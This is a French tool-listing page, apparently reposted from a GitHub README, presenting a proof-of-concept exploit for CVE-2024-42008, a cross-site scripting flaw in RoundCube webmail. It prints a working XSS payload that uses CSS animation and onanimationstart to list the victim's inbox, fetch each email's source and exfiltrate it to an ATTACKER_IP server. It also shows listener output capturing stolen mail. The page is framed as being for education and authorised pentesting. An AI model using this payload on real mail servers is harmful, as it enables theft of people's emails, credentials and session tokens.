Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !
Roundcube-CVE-2024-42008-POC — Preuve de concept d'exploitation pour CVE-2024-42008, une vulnérabilité de Cross-Site Scripting dans le webmail RoundCube. Distribue des charges utiles XSS via les formulaires de contact pour voler des emails, des identifiants et des jetons de session dans des environnements de test d'intrusion autorisés. | Kitploit
Preuve de concept d'exploitation pour CVE-2024-42008, une vulnérabilité de Cross-Site Scripting dans le webmail RoundCube. Distribue des charges utiles XSS via les formulaires de contact pour voler des emails, des identifiants et des jetons de session dans des environnements de test d'intrusion autorisés.
Partager
CVE-2024-42008 Exploit XSS RoundCube
Aperçu
Ce dépôt contient un exploit de preuve de concept pour CVE-2024-42008, une vulnérabilité de type Cross-Site Scripting (XSS) dans l'application webmail RoundCube. Cet exploit est conçu à des fins éducatives et pour des environnements de test d'intrusion contrôlés comme HackTheBox.
Détails de la vulnérabilité
Résumé de CVE-2024-42008
CVE ID: CVE-2024-42008
Type : Cross-Site Scripting (XSS)
Score CVSS : Élevé
Versions affectées :
RoundCube ≤ 1.5.7
RoundCube 1.6.x ≤ 1.6.7
Versions corrigées : 1.5.8, 1.6.8+
Détails techniques
La vulnérabilité existe dans rcmail_action_mail_get->run() et permet à des attaquants distants d'exécuter du JavaScript arbitraire dans le navigateur des victimes. Le défaut provient d'une validation insuffisante des entrées lors du traitement du contenu des e-mails, notamment dans la gestion des animations CSS et des contextes d'exécution JavaScript.
Vecteur d'attaque clé :
Contenu HTML malveillant injecté via des formulaires de contact ou des messages e-mail
Propriétés d'animation CSS utilisées pour déclencher l'exécution JavaScript
Les gestionnaires d'événements onanimationstart contournent les filtres de contenu
La charge utile JavaScript s'exécute dans le contexte de l'application webmail
Impact
Une exploitation réussie permet aux attaquants de :
Voler les e-mails de la victime depuis la boîte de réception et d'autres dossiers
Exfiltrer les métadonnées des e-mails (UIDs, listes de messages)
Accéder au code source des e-mails et aux pièces jointes
Envoyer des e-mails depuis le compte de la victime
Récolter les identifiants de connexion et les jetons de session
Effectuer des actions au nom de la victime
Analyse du script d'exploit
Architecture du script
L'exploit se compose de trois composants principaux :
Livraison de la charge utile XSS : Envoie du HTML malveillant via le formulaire de contact
Serveur HTTP : Écoute les données exfiltrées
Traitement des données : Capture et journalise les e-mails volés
Décomposition de la charge utile
root@kitploit:~
// The core XSS payload uses CSS animations to trigger JavaScript
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=
// 1. Fetch email list from victim's INBOX
fetch('/?_task=mail&_action=list&_mbox=INBOX&_page=&_remote=1')
.then(r=>r.text())
.then(t=>{
// 2. Extract email UIDs using regex
[...t.matchAll(/this\\.add_message_row\\((\\d+),/g)].forEach(m=>{
// 3. For each email, fetch full source
fetch(`/?_task=mail&_uid=${m[1]}&_mbox=INBOX&_action=viewsource`)
.then(r=>r.text())
.then(data=>{
// 4. Exfiltrate email data to attacker server
fetch(`http://ATTACKER_IP:PORT/?data=${encodeURIComponent(data)}`)
})
})
})
; foo=bar">
Fonctionnalités clés
Opération continue : Peut envoyer des charges utiles à intervalles réguliers
Mode furtif : Empreinte minimale et gestion des erreurs
Journalisation des données : Capture et stockage automatiques des e-mails exfiltrés
Mode débogage : Support proxy pour l'analyse du trafic
Configurable : Plusieurs options en ligne de commande
[+] Listening on 10.10.14.209:8001 for exfiltrated data...
[2024-07-09 10:30:15] POST Request Sent! Status Code: 200
[+] 📩 Captured Email Data:
Return-Path: <[email protected]>
Received: from localhost (localhost [127.0.0.1])
...
[Email content]
--------------------------------------------------
[+] 🔥 Email data saved to emails.log
Avertissement
Ce code est fourni à des fins éducatives et de test d'intrusion autorisé uniquement. Les auteurs ne sont pas responsables de toute utilisation abusive ou des dommages causés par ce logiciel. Assurez-vous toujours d'avoir une autorisation appropriée avant de tester un système.